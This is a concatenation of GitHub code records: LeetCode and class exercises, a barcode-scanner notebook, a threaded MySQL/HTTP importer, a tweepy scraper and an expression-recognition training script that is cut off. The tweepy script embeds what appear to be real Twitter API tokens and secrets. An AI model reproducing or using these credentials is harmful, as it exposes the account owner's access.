dfs(node.left)\n dfs(node.right)\n output.append(node.val)\n\n dfs(root)\n return output\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass SolutionStack:\n def postorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n\n output = deque([])\n\n stack = [root]\n while stack:\n node = stack.pop()\n\n if node:\n stack.append(node.left)\n stack.append(node.right)\n\n output.appendleft(node.val)\n\n return output\n","repo_name":"liaison/LeetCode","sub_path":"python/145_binary_tree_postorder_traversal.py","file_name":"145_binary_tree_postorder_traversal.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"10977265050","text":"# dog class\nclass Dog:\n all = \"mammals\"\n def __init__(self,name,age):\n self.name = name\n self.age = age\n self.is_hungry = True\n\n def eating(self):\n self.is_hungry = False\n\n # using the pets class to manipulate dog class instances\nclass Pets:\n dogs = []\n \n def __init__(self,dogs):\n self.dogs = dogs\n\ndomestic = [Dog(\"Tom\",6),Dog(\"Fletcher\",7),Dog(\"Larry\",9)]\n\npets = Pets(domestic)\n\nprint(\"I have {} dogs\".format(len(pets.dogs)))\n\nfor dog in pets.dogs:\n dog.eating()\n print(\"{} is {}\".format(dog.name,dog.age))\n\nprint(\"And they're all {},ofcourse.\".format(dog.all))\n\nall_hungry = False\n\nfor dog in pets.dogs:\n if dog.is_hungry:\n all_hungry = True\nif all_hungry:\n print(\"My dogs are hungry.\")\nelse:\n print(\"My dogs are not hungry\")\n\n","repo_name":"zydplatform/OOP_EXERCISE","sub_path":"pets_class.py","file_name":"pets_class.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17282089740","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport math\nimport os\nimport random as rand\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport cv2\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom PIL import Image\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# 
In[2]:\n\n\ntrain_img = \"W:/Documents/College/ENEE408A/imgs/sample-barcode4.jpg\"\nimage = cv2.imread(train_img) # Load an image as numpy array\ngreyImage = cv2.imread(train_img, cv2.IMREAD_GRAYSCALE)\nprint(image.shape)\n##for x in range(image.shape[0]):\n## print('{')\n## for y in range(image.shape[1]):\n## if (y < image.shape[1] - 1):\n## print(\"%d,\" % (image[x][y]), end =\" \")\n## else:\n## print(\"%d},\"% (image[x][y]), end =\" \")\nplt.gray()\nplt.imshow(image)\n\n\n# In[136]:\n\n\ndef thresholdImg():\n for x in range(0, image.shape[0]):\n for y in range(0, image.shape[1]):\n if (image[x][y] < 180):\n image[x][y] = 0;\n else:\n image[x][y] = 255;\n \n#thresholdImg()\nplt.gray()\nplt.imshow(image)\n\ndef eq(slope, y, centerX, centerY):\n return int((slope * (y - centerY)) + centerX)\n\ncenter = [int(image.shape[0] / 2), int(image.shape[1] / 2)]\nprint(center)\nfor theta in range(0, 180, 2):\n for y in range(0, image.shape[1]):\n ##print(eq(math.sin(math.radians(theta)), x, center[0], center[1]))\n newX = eq(math.sin(math.radians(theta)) / math.cos(math.radians(theta)), y, center[0], center[1])\n if (newX < image.shape[0] and newX >= 0 and y < image.shape[1] / 20):\n if (theta < 60):\n image[newX][y][0] = 255\n image[newX][y][1] = 0\n image[newX][y][2] = 0\n elif (theta < 120):\n image[newX][y][0] = 0\n image[newX][y][1] = 255\n image[newX][y][2] = 0\n elif (theta <= 180):\n image[newX][y][0] = 0\n image[newX][y][1] = 0\n image[newX][y][2] = 255\n #else:\n #print(\"x: %d, y: %d\" % (x, newY))\n \nplt.gray()\nplt.imshow(image)\n \n\n\n# In[3]:\n\n\ndef thresholdGreyImg(threshold):\n for x in range(0, greyImage.shape[0]):\n for y in range(0, greyImage.shape[1]):\n if (greyImage[x][y] < threshold):\n greyImage[x][y] = 0;\n else:\n greyImage[x][y] = 255;\n \nthresholdGreyImg(195)\nplt.gray()\nplt.imshow(greyImage)\n\ndef eq(slope, y, centerX, centerY):\n return int((slope * (y - centerY)) + centerX)\n\ncenter = [int(image.shape[0] / 2), int(image.shape[1] / 2)]\nedgeX = [image.shape[0], 0]\nedgeY = [image.shape[1], 0]\nprint(center)\n\nfor theta in range(0, 180, 2):\n isWhite = 0\n \n for y in range(0, image.shape[1]):\n ##print(eq(math.sin(math.radians(theta)), x, center[0], center[1]))\n newX = eq(math.sin(math.radians(theta)) / math.cos(math.radians(theta)), y, center[0], center[1])\n if (newX < image.shape[0] and newX >= 0):\n if (greyImage[newX][y] == 255):\n isWhite += 1\n \n if (isWhite >= 35):\n print(\"x: %d, y: %d\" % (newX, y))\n\n if (newX < center[0]):\n if (edgeX[0] > newX):\n edgeX[0] = newX\n else:\n if (edgeX[1] < newX):\n edgeX[1] = newX\n \n if (y < center[1]):\n if (edgeY[0] > y):\n edgeY[0] = y\n else:\n if (edgeY[1] < y):\n edgeY[1] = y\n break\n else:\n isWhite = 0\n\nprint(edgeX)\nprint(edgeY)\nfor y in range(0, (edgeY[1] - 16) - (edgeY[0] + 16)):\n newY = min(y + edgeY[0], image.shape[1] - 1)\n image[int((edgeX[1] - edgeX[0]) / 2)][newY][0] = 255\n image[int((edgeX[1] - edgeX[0]) / 2)][newY][1] = 0\n image[int((edgeX[1] - edgeX[0]) / 2)][newY][2] = 0\n image[int((edgeX[1] - edgeX[0]) / 2) - 1][newY][0] = 255\n image[int((edgeX[1] - edgeX[0]) / 2) - 1][newY][1] = 0\n image[int((edgeX[1] - edgeX[0]) / 2) - 1][newY][2] = 0\n image[int((edgeX[1] - edgeX[0]) / 2) + 1][newY][0] = 255\n image[int((edgeX[1] - edgeX[0]) / 2) + 1][newY][1] = 0\n image[int((edgeX[1] - edgeX[0]) / 2) + 1][newY][2] = 0\nplt.figure() \nplt.gray()\nplt.imshow(image)\n \n\n\n# In[10]:\n\n\ndef thresholdGreyImg(threshold):\n for x in range(0, greyImage.shape[0]):\n for y in range(0, 
greyImage.shape[1]):\n if (greyImage[x][y] < threshold):\n greyImage[x][y] = 0;\n else:\n greyImage[x][y] = 255;\n\ndef processCode(code1, code2, code3, code4):\n if (code1 == 3 and code2 == 2 and code3 == 1 and code4 == 1):\n return 0\n elif (code1 == 2 and code2 == 2 and code3 == 2 and code4 == 1):\n return 1\n elif (code1 == 2 and code2 == 1 and code3 == 2 and code4 == 2):\n return 2 \n elif (code1 == 1 and code2 == 4 and code3 == 1 and code4 == 1):\n return 3\n elif (code1 == 1 and code2 == 1 and code3 == 3 and code4 == 2):\n return 4\n elif (code1 == 1 and code2 == 2 and code3 == 3 and code4 == 1):\n return 5\n elif (code1 == 1 and code2 == 1 and code3 == 1 and code4 == 4):\n return 6\n elif (code1 == 1 and code2 == 3 and code3 == 1 and code4 == 2):\n return 7\n elif (code1 == 1 and code2 == 2 and code3 == 1 and code4 == 3):\n return 8\n elif (code1 == 3 and code2 == 1 and code3 == 1 and code4 == 2):\n return 9 \n else:\n return -1\n\ndef normalizeBars(maxBars):\n avg = (bars[0] + bars[1] + bars[2]) / 3.0\n diff = 3.0 - avg\n print(\"avg: %f\" % (avg))\n for i in range(0, maxBars):\n bars[i] /= avg\n if (np.round(bars[i]) == 0):\n bars[i] = 0.5\n \n if (i % 4 == 2):\n print(\"%f\" % (bars[i]))\n else:\n print(\"%f\" % (bars[i]), end =\" \")\n #bars[i] = np.round(bars[i] + diff)\n print()\n \n offset = 3\n \n for i in range(0, 12):\n if (i == 6):\n #bars[i * 4 + offset + 0] = np.round(bars[i * 4 + offset + 0])\n #bars[i * 4 + offset +1] = np.round(bars[i * 4 + offset + 1])\n offset += 5\n \n if (np.round(bars[i * 4 + offset]) + np.round(bars[i * 4 + offset + 1]) + np.round(bars[i * 4 + offset + 2]) + np.round(bars[i * 4 + offset + 3]) == 7):\n for n in range(0,4):\n bars[i * 4 + offset + n] = np.round(bars[i * 4 + offset + n])\n elif (np.round(bars[i * 4 + offset] + diff) + np.round(bars[i * 4 + offset + 1] + diff) + np.round(bars[i * 4 + offset + 2] + diff) + np.round(bars[i * 4 + offset + 3] + diff) == 7):\n for n in range(0,4):\n bars[i * 4 + offset + n] = np.round(bars[i * 4 + offset + n] + diff)\n elif (np.round(bars[i * 4 + offset] - diff) + np.round(bars[i * 4 + offset + 1] - diff) + np.round(bars[i * 4 + offset + 2] - diff) + np.round(bars[i * 4 + offset + 3] - diff) == 7):\n for n in range(0,4):\n bars[i * 4 + offset + n] = np.round(bars[i * 4 + offset + n] - diff)\n \n for i in range(0, maxBars):\n bars[i] = np.round(bars[i])\n\n\n# In[11]:\n\n\nthresholdGreyImg(170)\nplt.gray()\nplt.imshow(greyImage)\n\ninit = 0\n#middle = int(greyImage.shape[0] / 2)\nmiddle = int((edgeX[1] - edgeX[0]) / 2)\npixelCount = 0\nbars = np.zeros(greyImage.shape[1])\ncurrBar = 0\n\n#for y in range(0, greyImage.shape[1]):\nfor y in range(edgeY[0], edgeY[1]):\n if (init == 0):\n if (greyImage[middle][y] == 0):\n init = 1\n isBlack = 1\n pixelCount += 1\n else:\n if (greyImage[middle][y] != 0 and isBlack == 1):\n #print(\"y: %d, pixelcount: %d\" % (y, pixelCount))\n bars[currBar] = pixelCount\n currBar += 1\n pixelCount = 0\n isBlack = 0\n elif (greyImage[middle][y] != 255 and isBlack == 0):\n #print(\"y: %d, pixelcount: %d\" % (y, pixelCount))\n bars[currBar] = pixelCount\n currBar += 1\n pixelCount = 0\n isBlack = 1\n \n pixelCount += 1\n\nnormalizeBars(currBar)\n\nfor bar in range(currBar):\n if (bar % 4 == 2):\n print(\"%f\" % (bars[bar]))\n else:\n print(\"%f\" % (bars[bar]), end =\" \")\nprint()\n\ncurrNum = 0\noffset = 3\nresult = \"\"\nerror = 0\n\nfor i in range(0, 12):\n print(\"i: %d, offset: %d\" % (i, offset))\n code = processCode(int(bars[i * 4 + offset]), int(bars[i * 4 + 1 + offset]), 
int(bars[i * 4 + 2 + offset]),\n int(bars[i * 4 + 3 + offset]))\n print(\"%d %d %d %d, code: %d\" % (int(bars[i * 4 + offset]), int(bars[i * 4 + 1 + offset]), int(bars[i * 4 + 2 + offset]),\n int(bars[i * 4 + 3 + offset]), code))\n currNum += 1\n \n if (code != -1):\n result += chr(48 + code)\n print(\"result: %s\" % (result))\n \n if (currNum == 6):\n offset += 5\n else:\n result += \"?\"\n error = -1\n\n\n# In[29]:\n\n\nthresholdGreyImg(170)\nplt.gray()\nplt.imshow(greyImage)\n\ninit = 0\n#middle = int(greyImage.shape[0] / 2)\nmiddle = int((edgeX[1] - edgeX[0]) / 2)\npixelCount = 0\nbars = np.zeros(greyImage.shape[1])\ncurrBar = 0\n\n#for y in range(0, greyImage.shape[1]):\nfor y in range(edgeY[0], greyImage.shape[1]):\n # Chunk labels:\n # _ _#1#\n # #2#_ _\n \n chunk1 = greyImage[middle][y]\n chunk2 = greyImage[middle - 1][y]\n chunk3 = greyImage[middle - 2][y]\n print(\"%d %d %d\" % (chunk1, chunk2, chunk3))\n weight = (int(chunk1) + int(chunk2) + int(chunk3))\n print(weight)\n \n # keep checking until black is found\n if (init == 0):\n if (weight < 256):\n init = 1\n isBlack = 1\n pixelCount += 1\n else:\n if (chunk1 == chunk2): \n if (chunk1 != 0 and isBlack == 1):\n #print(\"y: %d, pixelcount: %d\" % (y, pixelCount))\n bars[currBar] = pixelCount\n currBar += 1\n pixelCount = 0\n isBlack = 0\n elif (chunk1 != 255 and isBlack == 0):\n #print(\"y: %d, pixelcount: %d\" % (y, pixelCount))\n bars[currBar] = pixelCount\n currBar += 1\n pixelCount = 0\n isBlack = 1\n pixelCount += 1\n\nnormalizeBars(currBar)\n\nfor bar in range(currBar):\n if (bar % 4 == 2):\n print(\"%f\" % (bars[bar]))\n else:\n print(\"%f\" % (bars[bar]), end =\" \")\nprint()\n\ncurrNum = 0\noffset = 3\nresult = \"\"\nerror = 0\n\nfor i in range(0, 12):\n print(\"i: %d, offset: %d\" % (i, offset))\n code = processCode(int(bars[i * 4 + offset]), int(bars[i * 4 + 1 + offset]), int(bars[i * 4 + 2 + offset]),\n int(bars[i * 4 + 3 + offset]))\n print(\"%d %d %d %d, code: %d\" % (int(bars[i * 4 + offset]), int(bars[i * 4 + 1 + offset]), int(bars[i * 4 + 2 + offset]),\n int(bars[i * 4 + 3 + offset]), code))\n currNum += 1\n \n if (code != -1):\n result += chr(48 + code)\n print(\"result: %s\" % (result))\n \n if (currNum == 6):\n offset += 5\n else:\n result += \"?\"\n error = -1\n print(\"result: %s\" % (result))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"just32/408A_Barcode_Scanner","sub_path":"ScannerSTMCode/ScannerPythonCode/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31598988061","text":"# -*- coding:utf-8 -*-\n\n__all__ = ['Importer']\n\nimport sys, os,threading,json,math,traceback,gc,time\nimport requests,xlrd,pymysql\nfrom requests_toolbelt import MultipartEncoder\nfrom pymysql.cursors import DictCursor\n\nfrom lib.Base import Base\n\nclass Importer(Base):\n rootPath = os.path.dirname(os.path.realpath(sys.argv[0]))\n tmpPath = rootPath + '/tmp'\n\n exportPath = tmpPath + '/export-data/page-{page}.csv'\n\n dataInfoDir = tmpPath + '/import-info'\n dataInfoPath = dataInfoDir + '/page-{page}.json'\n taskInfoPath = dataInfoDir + '/task.json'\n\n errorPath = dataInfoDir + '/error.json'\n errorLogPath = dataInfoDir + '/error.log'\n\n threadList = []\n cfg = {}\n\n def __init__(self, inited=True):\n super().__init__(inited)\n\n def parent(self):\n return super()\n \n def init(self):\n super().init()\n\n try:\n if not os.path.exists(self.dataInfoDir):\n os.mkdir(self.dataInfoDir)\n 
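# os.mkdir raises if the directory cannot be created (permissions, or a race with another process); any such failure is treated as fatal by the handler below\n        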
except:\n traceback.print_exc()\n self.log('Can not create [/import-info] path.', ['exit', None])\n\n def loadConfig(self):\n super().loadConfig()\n self.cfg = self.config['Import'] if self.config else None\n \n #extract\n if self.cfg and self.cfg[self.cfg['extractSection']]:\n for k, v in self.cfg[self.cfg['extractSection']].items():\n self.cfg[k] = v\n\n return self.cfg\n\n def stopTask(self):\n self.taskStatus = -1\n gc.collect()\n\n def runTask(self, resumeRun=False, loopRun=False):\n self.loadConfig()\n \n if not resumeRun:\n self.log('Start clearing import info dir...')\n self.clearDir(self.dataInfoDir)\n\n gc.collect()\n self.threadList.clear()\n self.threadLock = threading.Semaphore(self.cfg['maxThreadNum'])\n self.taskStatus = 1\n self.taskFinished = -1 if self.isLoopTask() else 0\n\n totalPage = self.getTotalPage()\n \n self.log('Start running import task...')\n #init\n for i in range(1, totalPage + 1):\n #print('page-%d' % i)\n if not self.isLoopTask() and os.path.exists(self.dataInfoPath.format(page=i)):\n self.taskFinished += 1\n elif self.isLoopTask() and i <= self.getTaskInfo()['page']:\n self.taskFinished += 1\n else:\n t = threading.Thread(target=self.importData,args=(i, None))\n self.threadList.append(t)\n \n #start thread\n for v in self.threadList:\n k = v._args[0]\n if self.taskStatus < 0:\n self.log('Thread import-%d has been interrupted without starting' % k)\n break\n\n self.threadLock.acquire()\n v.start()\n self.log('Thread import-%d has started' % k, ['progress', self.getProgress('progress')])\n\n self.log('All %d threads have started' % len(self.threadList))\n\n for k, v in enumerate(self.threadList):\n if self.taskStatus < 0:\n self.log('Thread import-%d has been interrupted without ending' % (k+1))\n break\n\n v.join()\n self.log('Thread import-%d has finished' % (k+1), ['progress', self.getProgress('progress')])\n\n \n if self.taskStatus == 1:\n self.taskStatus = 0\n self.threadList.clear()\n gc.collect()\n\n #loop\n if loopRun and self.taskStatus>=0 and self.taskFinished=0:\n self.runTask(True, True)\n else:\n self.log('Import task has finished', ['end', self.getProgress('end')])\n \n def getFileData(self, path, page):\n data = ''\n if path.endswith('.xlsx'):\n book = xlrd.open_workbook(path)\n table = book.sheet_by_index(0)\n importStartLine = 0\n\n if self.getExportConfig('exportPrefix'):\n importStartLine = 1\n\n for row_num in range(table.nrows):\n if row_num < importStartLine:\n continue\n \n row_values = table.row_values(row_num)\n c = len(row_values)\n for i in range(0, c):\n if row_values[i] == None:\n data += self.cfg['importNullValue']\n else:\n data += '\"%s\"' % self.filterData(self.cfg['importFilterPattern'], row_values[i], 'import')\n \n if i < c-1:\n data += \",\"\n else:\n data += '\\r\\n' if self.isWindows() else '\\n'\n \n with open(self.exportPath.format(page=str(page)), \"wb\") as f:\n f.write(data.encode(self.cfg['importCharset'], 'ignore'))\n\n return data\n else:\n with open(path, \"rb\") as f:\n data = f.read()\n \n #data = '{ \"index\": {\"_id\":\"0058adeea6c9ff1a9509c14c5d047939\"}}\\n{ \"name\":\"上海歌绍企业管理中心\" }\\n{ \"index\": {\"_id\":\"0058aedb3d9d828c16a9424aaa225036\"}}\\n{ \"company_id\": \"0058aedb3d9d828c16a9424aaa225036\", \"company_name\":\"江西省祥和房地产营销有限公司\" }\\n'\n #data = data.encode('utf-8')\n\n return data\n\n def importData(self, page, extra=None):\n if self.taskStatus < 0:\n self.log('Thread import-%d has been interrupted' % page)\n self.threadLock and self.threadLock.release()\n return\n\n #get data\n path = 
self.exportPath.format(page=str(page))\n if self.getExportConfig('exportType') == 'excel':\n path = path.replace('.csv', '.xlsx')\n \n if not os.path.exists(path):\n self.threadLock and self.threadLock.release()\n self.log('The page %d exported data does not exist' % page)\n return False\n \n data = self.getFileData(path, page)\n \n #empty data\n if not data:\n with open(self.dataInfoPath.format(page=str(page)), \"w\", encoding=\"utf-8\") as f:\n f.write('{\"total\":0,\"error\":0}')\n \n self.taskFinished += 1\n \n self.log('Thread import-%d data is empty' % page)\n self.threadLock and self.threadLock.release()\n return\n \n if self.taskStatus < 0:\n #gc\n del data\n gc.collect()\n\n self.log('Thread import-%d has been interrupted' % page)\n self.threadLock and self.threadLock.release()\n\n return\n\n\n if self.cfg['driver'] == 'mysql':\n self.uploadMysqlData(data, page)\n else:\n self.uploadHttpData(data, page)\n\n #gc\n del data\n gc.collect()\n\n self.threadLock and self.threadLock.release()\n\n return\n\n def uploadMysqlData(self, data, page):\n self.log('Start importing the page %d...' % page)\n \n if isinstance(data, bytes):\n data = data.decode(self.cfg['importCharset'], 'ignore')\n \n lines = data.strip().split('\\n')\n if len(lines)<=0:\n self.log('The page %d has no any lines' % page, ['error', None])\n return False\n\n try:\n db = pymysql.connect(\n host=self.cfg['host'], \n port=self.cfg['port'],\n user=self.cfg['user'], \n password=self.cfg['password'], \n database=self.cfg['database'], \n charset=self.cfg['charset'], \n connect_timeout=self.cfg['connectTimeout']\n )\n cursor = db.cursor(DictCursor)\n\n affected_rows = 0\n for sql in lines:\n affected_rows += cursor.execute(sql)\n \n db.commit()\n db.close()\n \n self.log('The page %d finished, total %d items, error %d items' % (page, affected_rows, 0))\n\n #save data\n try:\n with open(self.dataInfoPath.format(page=str(page)), \"w\", encoding=\"utf-8\") as f:\n f.write('{\"total\":%d,\"error\":%d}' % (affected_rows, 0))\n\n self.taskFinished += 1\n\n self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), affected_rows, 0])\n except:\n self.log('The page %d info saved failure' % page, ['error', None])\n\n #save task\n if self.isLoopTask():\n if self.saveTaskInfo(page, 0, 0, affected_rows, 0):\n self.deleteTaskInfo(page)\n\n\n #gc\n del db\n del cursor\n gc.collect()\n\n return True\n except Exception as e:\n self.log('The page %d mysql data can not been imported, Error: %s' % (page, e.__str__()), ['error', None])\n return False\n\n\n def uploadHttpData(self, data, page):\n self.log('Start uploading the page %d...' 
% page)\n\n path = self.exportPath.format(page=str(page))\n headers = json.loads(self.cfg['headers']) if self.cfg['headers'] else {}\n cookies = json.loads(self.cfg['cookies']) if self.cfg['cookies'] else {}\n \n try:\n if self.cfg['method'] == 'post':\n response = requests.post(self.cfg['url'], data=data, timeout=self.cfg['connectTimeout'], headers=headers, cookies=cookies, verify=False)\n else:\n boundary = '----------shiyaxiong1984----------'\n multipart_encoder = MultipartEncoder(fields={'file': (os.path.basename(path), data, 'text/plain')}, boundary=boundary)\n headers['Content-Type'] = multipart_encoder.content_type\n response = requests.post(self.cfg['url'], data=multipart_encoder, timeout=self.cfg['connectTimeout'], headers=headers, cookies=cookies, verify=False)\n except Exception as e:\n response = None\n self.log('The page %d upload failure, HTTP Error: %s' % (page, e.__str__()), ['error', None])\n \n if response == None or response.status_code != 200:\n self.log('The page %d upload failure, Error: %s' % (page, 'None' if response == None else response.text), ['error', None])\n\n return False\n \n #print(response.text)\n try:\n content = json.loads(response.text)\n except Exception as e:\n self.log('The page %d parse json data failure, Error: %s' % (page, e.__str__()), ['error', None])\n\n return False\n\n\n errors = 0\n if 'items' in content.keys():\n if content['errors']:\n for (k, v) in enumerate(content['items']):\n d = v['index']\n if d['status'] not in [200,201]:\n errors += 1\n self.log('The %d-%d upload failure, _id=%s, Error: %s' % (page, k+1, d['_id'], d['error']['reason'] if not self.isEmpty('error', d) else json.dumps(d)), ['error', None])\n\n #save error\n try:\n with open(self.errorPath, \"a+\", encoding=\"utf-8\") as f:\n #f.write(d['_id'] + '\\n')\n f.write(self.getFileContent(path, (k+1) * 2 - 1, 2).strip() + '\\n')\n except:\n self.log('The %d-%d error data saved failure, _id=%s' % (page, k+1, d['_id']), ['error', None])\n \n\n self.log('The page %d finished, succee %d, error %d' % (page, len(content['items']), errors))\n else:\n self.log('The page %d finished, total %d items' % (page, len(content['items'])))\n\n #save data\n try:\n with open(self.dataInfoPath.format(page=str(page)), \"w\", encoding=\"utf-8\") as f:\n f.write('{\"total\":%d,\"error\":%d}' % (len(content['items']), errors))\n\n self.taskFinished += 1\n \n self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), len(content['items']), errors])\n except:\n self.log('The page %d info saved failure' % page, ['error', None])\n\n #save task\n if self.isLoopTask():\n if self.saveTaskInfo(page, 0, 0, len(content['items']), errors):\n self.deleteTaskInfo(page)\n else:\n self.log('The page %d finished, total %d items, error %d items' % (page, content['success'], content['error']))\n\n #save data\n try:\n with open(self.dataInfoPath.format(page=str(page)), \"w\", encoding=\"utf-8\") as f:\n f.write('{\"total\":%d,\"error\":%d}' % (content['success'], content['error']))\n\n self.taskFinished += 1\n\n self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), content['success'], content['error']])\n except:\n self.log('The page %d info saved failure' % page, ['error', None])\n\n #save task\n if self.isLoopTask():\n if self.saveTaskInfo(page, 0, 0, content['success'], content['error']):\n self.deleteTaskInfo(page)\n\n\n #gc\n del content\n del response\n\n return True\n\n 
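\n# usage sketch (hypothetical driver -- the real entry point lives outside this module):\n#   imp = Importer()\n#   imp.runTask(resumeRun=False, loopRun=True)  # fans pages out to importData() worker threads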
\n","repo_name":"pipibear/synczer","sub_path":"lib/Importer.py","file_name":"Importer.py","file_ext":"py","file_size_in_byte":13610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"34963672242","text":"\r\nimport tweepy\r\nimport numpy as np\r\nimport os\r\naccess_token = '1185203655705653249-MI55LF0YDXJHU06sATMMQtHjfWrkKF' # access details of tweet\r\naccess_token_secret = '9PCjIq70gj0o8zHgrtkvr1K6vlTo5H2P1TyQcfOqyh7B3'\r\nconsumer_key = 'kkEHLGQM2iRKAIRzh33eAQ2RN'\r\nconsumer_secret = 'pNa2PFNYUVWSnUPYuXaFPybExsl3ABY1oLHBkPTtY1AZIJpFd7'\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_token, access_token_secret)\r\n\r\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\r\n#api = tweepy.API(auth)\r\nt_list = []\r\ncredentials = {}\r\ncount = 0\r\n\r\nfor tweet in tweepy.Cursor(api.search, q=\"airfrance \", lang=\"en\").items(40):\r\n credentials['text'] = tweet.text\r\n\r\n Time = tweet.created_at\r\n print(Time)\r\n Time = int(Time.strftime(\"%Y%m%d%H%M%S\"))\r\n t_list.append(Time)\r\n ad = tweet.id\r\n count+=1\r\n\r\ni=0\r\nct=0\r\nx = []\r\ny = []\r\nwhile(i < count):\r\n str1 = str(t_list[i])\r\n str2 = str1[6:8]\r\n print(str2)\r\n if(i==0):\r\n x.append(str2)\r\n for a in range(len(x)):\r\n if(a == str2):\r\n ct+=1\r\n break\r\n else:\r\n ct = 0\r\n x.append(str2)\r\n ct+=1\r\n break\r\n i +=1\r\n\r\nprint(x)","repo_name":"DattaDhebe/Rumor-Detection-Project","sub_path":"extract_ids.py","file_name":"extract_ids.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11729607121","text":"from __future__ import print_function\n\nimport sys\nimport argparse\nimport time\nimport math\nimport os\n\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torch.utils import data\nfrom torchvision import transforms, datasets\nfrom torch.optim import lr_scheduler\n\nfrom util import AverageMeter\nfrom util import adjust_learning_rate, warmup_learning_rate, accuracy\nfrom util import set_optimizer, save_model\nfrom networks.resnet_big import SupConResNet, LinearClassifier\nfrom dataset_loader import Dataset_RAF, Dataset_AffectNet, FERPlus\nfrom sampler import ImbalancedDatasetSampler\n\ntry:\n import apex\n from apex import amp, optimizers\nexcept ImportError:\n pass\n\n\ndef parse_option():\n parser = argparse.ArgumentParser('argument for training')\n\n parser.add_argument('--print_freq', type=int, default=100,\n help='print frequency')\n parser.add_argument('--save_freq', type=int, default=50,\n help='save frequency')\n parser.add_argument('--batch_size', type=int, default=128,\n help='batch_size')\n parser.add_argument('--num_workers', type=int, default=16,\n help='num of workers to use')\n parser.add_argument('--epochs', type=int, default=100,\n help='number of training epochs')\n\n # optimization\n parser.add_argument('--learning_rate', type=float, default=4, help='learning rate')\n parser.add_argument('--lr_decay_epochs', type=str, default='60,75,90',\n help='where to decay lr, can be a list')\n parser.add_argument('--lr_decay_rate', type=float, default=0.2,\n choices=['0.2'], help='decay rate for learning rate')\n parser.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n parser.add_argument('--momentum', type=float, default=0.9,\n help='momentum')\n\n # model dataset\n parser.add_argument('--model', type=str, 
default='resnet18')\n parser.add_argument('--dataset', type=str, default='SFEW',\n choices=['RAF-DB', 'AffectNet', 'SFEW', 'FERPlus', 'CK', 'FED-RO'], help='dataset')\n # RAF-DB setting\n parser.add_argument('--RAF-train-root', type=str, default='/home/gpu/FER/datasets/RAFdataset/train',\n help=\"root path to train data directory\")\n parser.add_argument('--RAF-test-root', type=str, default='/home/gpu/FER/datasets/RAFdataset/test',\n help=\"root path to test data directory\")\n parser.add_argument('--RAF-label-train-txt', default='/home/gpu/FER/datasets/RAFdataset/RAF_train_label2.txt', type=str, help='')\n parser.add_argument('--RAF-label-test-txt', default='/home/gpu/FER/datasets/RAFdataset/RAF_test_label2.txt', type=str, help='')\n # AffectNet setting\n parser.add_argument('--Aff-root', type=str, default='/home/gpu/FER/datasets/Manually_Annotated_Images_Crop1308',\n help=\"root path to train data directory\")\n parser.add_argument('--Aff-label-train-txt', default='/home/gpu/FER/datasets/training_label2.csv', type=str, help='')\n parser.add_argument('--Aff-label-test-txt', default='/home/gpu/FER/datasets/validation_label2.csv', type=str, help='')\n # SFEW setting\n parser.add_argument('--SFEW-train-root', type=str, default='/home/gpu/FER/datasets',\n help=\"root path to train data directory\")\n parser.add_argument('--SFEW-test-root', type=str, default='/home/gpu/FER/datasets/SFEW/Val_crop',\n help=\"root path to test data directory\")\n parser.add_argument('--SFEW-label-train-txt', default='/home/gpu/FER/datasets/SFEW/train.txt', type=str, help='')\n parser.add_argument('--SFEW-label-test-txt', default='/home/gpu/FER/datasets/SFEW/val.txt', type=str, help='')\n # FERPlus setting\n parser.add_argument('--file-name', type=str, default='/home/gpu/FER/datasets/FER++/FERPlus1.h5', help=\"root path to train data directory\")\n # FED-RO setting\n parser.add_argument('--FED_test_root', default='/home/gpu/FER/datasets/FED-RO_crop1', type=str, help='')\n parser.add_argument('--FED-label-test-txt', default='/home/gpu/FER/datasets/FED-RO_crop/FED-RO.txt', type=str, help='')\n # CK+ setting\n parser.add_argument('--CK-test-root', type=str, default='/home/gpu/FER/datasets/CK+_crop',\n help=\"root path to test data directory\")\n parser.add_argument('--CK-label-test-txt', default='/home/gpu/FER/datasets/CK+_crop/CK+_8.txt', type=str,\n help='')\n\n # other setting\n parser.add_argument('--cosine', action='store_true',\n help='using cosine annealing')\n parser.add_argument('--warm', action='store_true',\n help='warm-up for large batch training')\n\n parser.add_argument('--ckpt', type=str, default='save/Mix_models/CRS-CONT_Mix_resnet18_bsz_128/last.pth',\n help='path to pre-trained model')\n\n opt = parser.parse_args()\n\n # set the path according to the environment\n opt.data_folder = './datasets/'\n\n iterations = opt.lr_decay_epochs.split(',')\n opt.lr_decay_epochs = list([])\n for it in iterations:\n opt.lr_decay_epochs.append(int(it))\n\n opt.model_name = '{}_{}_lr_{}_decay_{}_bsz_{}'.\\\n format(opt.dataset, opt.model, opt.learning_rate, opt.weight_decay,\n opt.batch_size)\n\n if opt.cosine:\n opt.model_name = '{}_cosine'.format(opt.model_name)\n\n # warm-up for large-batch training,\n if opt.warm:\n opt.model_name = '{}_warm'.format(opt.model_name)\n opt.warmup_from = 0.01\n opt.warm_epochs = 10\n if opt.cosine:\n eta_min = opt.learning_rate * (opt.lr_decay_rate ** 3)\n opt.warmup_to 